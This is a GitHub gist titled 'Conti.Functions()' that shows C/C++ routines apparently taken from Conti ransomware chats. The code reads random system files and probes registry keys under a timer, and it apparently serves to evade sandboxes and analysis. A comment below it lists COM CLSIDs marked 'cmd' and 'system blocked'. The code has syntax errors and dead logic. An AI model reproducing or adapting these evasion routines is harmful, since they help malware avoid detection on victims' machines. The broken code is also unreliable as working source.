Skip to content

Instantly share code, notes, and snippets.

@SofianeHamlaoui

SofianeHamlaoui/GetRandomBuf.c

Last active March 11, 2022 13:22
Show Gist options
  • Save SofianeHamlaoui/630309adaeb27068096f2023e76819a1 to your computer and use it in GitHub Desktop.
Save SofianeHamlaoui/630309adaeb27068096f2023e76819a1 to your computer and use it in GitHub Desktop.
Download ZIP
Conti.Functions()
Raw
GetRandomBuf.c
char* GetRandomBuf()
{
char tempFileName[MAX_PATH];
char targetFileName[MAX_PATH];
// random
size_t randomNum = 8;
WIN32_FIND_DATAA ffd;
DWORD size = 0;
GetSystemDirectoryA((LPSTR)tempFileName, (UINT)MAX_PATH);
GetSystemDirectoryA((LPSTR)targetFileName, (UINT)MAX_PATH);
StringCchCatA(tempFileName, MAX_PATH, "\\\*");
HANDLE f = FindFirstFileA(tempFileName, &ffd);
size_t count = 0;
char** fileNamesArr = new char*[5000];
DWORD rbRead;
for (size_t i = 0; i < 5000; ++i)
fileNamesArr[i] = new char[MAX_PATH];
// set randomly
size_t fileSize = 150000;
do
{
if (!(ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
{
if (ffd.nFileSizeLow > fileSize)
{
int a = 1;
int b = 2;
StringCchCopyA(fileNamesArr[count], MAX_PATH, ffd.cFileName;)
++count;
a += b + count;
}
}
} while (FindNextFileA(f, &ffd) && count < 5000);
FindClose((HANDLE)f);
randomNum %= count;
StringCchCatA(targetFileName, MAX_PATH, "\\\");
StringCchCatA(targetFileName, MAX_PATH, fileNamesArr[randomNum]);
HANDLE hFile = CreateFileA(targetFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
size = (DWORD)GetFileSize((HANDLE)hFile, nullptr);
char* buf = new char[size];
ReadFile((HANDLE)hFile, buf, size, &rbRead, nullptr);
for (DWORD i = 0; i < fileSize; ++i)
{
if (buf[i] == 0)
{
size_t z = i;
size_t t = i * 32;
size_t y = i * 123 - 44 + i;
z = t * y % 255;
if (z != 0)
buf[i] = z;
else
buf[i] = z + 23;
i = 0;
}
}
/*delete[] fileNamesArr;
pCloseHandle(hFile);
*/
buf[fileSize - 1] = 0;
return buf;
}
[24.09.21 15:37:40] orval: ``
bool QueryReg(char* buf, DWORD startTime)
{
size_t result = 0;
LSTATUS errCode = 0;
HKEY hKey;
size_t step = 0;
//do random
char* parameterName = (char*) "zsadsgjea";
//do random
char* parameterValue = (char*) "svogfiifotuz";
DWORD dataSize = 12;
while (step < StrLen(buf) - 18)
{
char* temp = (char*)MyHeapAlloc(12);// new char[12];
temp[11] = 0;
m_memcpy(temp, buf + step, 11);
errCode = (LSTATUS)RegOpenKeyExA((HKEY)HKEY_CURRENT_USER, temp, (DWORD)0, (REGSAM)KEY_READ, &hKey);
if (errCode != ERROR_FILE_NOT_FOUND && hKey)
{
errCode = (LSTATUS)RegQueryValueExA(hKey, (LPCSTR)parameterName, nullptr, nullptr, (LPBYTE)parameterValue, &dataSize);
if (errCode != ERROR_SUCCESS && hKey)
++result;
}
//step += 18;
step += 40;
free(temp);
if ((DWORD)GetTickCount() - startTime > 1000 * 20)
break;
}
return result > 10;
}
@SofianeHamlaoui
Copy link
Author

HKEY_CLASSES_ROOT\CLSID{27F71832-6815-48CB-902A-7A1D891BA962} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{294935CE-F637-4E7C-A41B-AB255460B862} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{41FCCC3A-1FA1-4949-953A-6EE61C46A4D1} Microsoft.Audio.AudioClient Binder - 0 cmd
HKEY_CLASSES_ROOT\CLSID{444F7305-1D7D-4BE9-8C29-CC3F1D220C40} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{562462DD-4F9A-4110-9D6A-C3CA0407FF76} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{69A95A38-C637-46A0-9FB2-1C939AEBF2E8} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{6EC153C1-371E-47E1-A896-2F7F80EB7842} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{73843B93-848F-453B-953D-2E5B911429DC} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{870AF99C-171D-4f9e-AF0D-E63DF40C2BC9} - 9 cmd
HKEY_CLASSES_ROOT\CLSID{8D9945C3-A621-4F52-8641-6D8B755F42E2} - 12 cmd system blocked
HKEY_CLASSES_ROOT\CLSID{ede7f087-890f-491c-b906-9abb31896960} CLSID_EuVolumeNotificationCallback - 0 cmd
HKEY_CLASSES_ROOT\CLSID{FD7F2B29-24D0-4B5C-B177-592C39F9CA10} psfactorybuffer - 2 cmd

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment